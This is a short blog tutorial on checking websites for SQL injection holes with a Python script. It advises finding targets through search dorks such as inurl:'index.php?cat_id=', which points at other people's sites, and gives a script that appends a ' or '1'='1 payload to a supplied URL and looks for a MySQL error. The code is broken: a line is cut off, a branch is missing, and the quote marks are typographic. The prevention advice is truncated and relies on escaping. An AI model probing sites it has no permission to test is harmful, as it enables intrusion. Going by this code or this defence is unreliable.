Posts How checking website vulnerability sql injection with simple code using python

How checking website vulnerability sql injection with simple code using python

Checking Vulnerability Sql Injection with Simple Code using Python - Will discuss how to check the SQL injection security hole in a website using a simple code with a python.
It only uses the GET parameters on the website


  • python 3.4 or latest
  • Internet Connection
  • Vulnerability a Website
  • Computer with Linux or Windows (here using Linux)

If you’re not install python, you can download python in

A Glimpse Of Python

Python is written in C, it is one of the easiest programming languages to hacking tools, it includes a lot of very useful libs.

Finding Vuln Website For Testing

To find a website for testing using simple sqli dorks, like {inurl:”index.php?cat_id=”}.

This Simple Code Sqli To Check For Vulnerabilities
Before starting, create new file with format .py e.g:

After that, then copy this code to a file that has been created:

import sys
import urllib
import urllib.request

fullurl = input(“Please specify the vulnerable url: “)

resp = urllib.request.urlopen(fullurl + “=1\’ or \‘1\’ = \‘1\’”)
body =
fullbody = body.decode(‘utf-8’)

if “You have an error in you SQL syntax” in fullbody:
print (“The website is classic SQL injection vulnerable!”)
print (“The website is not classic SQL injection vulnerable!”)

Save and running with command $python

How to prevent simple SQL injection

Preventing SQLi ON MYSQL if very simple. Just use mysql_real_escape string for queries, as example:

$query = sprintf(“SELECT * FROM users where user=’%s’ AND password=’%s’,




This post is licensed under CC BY 4.0 by the author.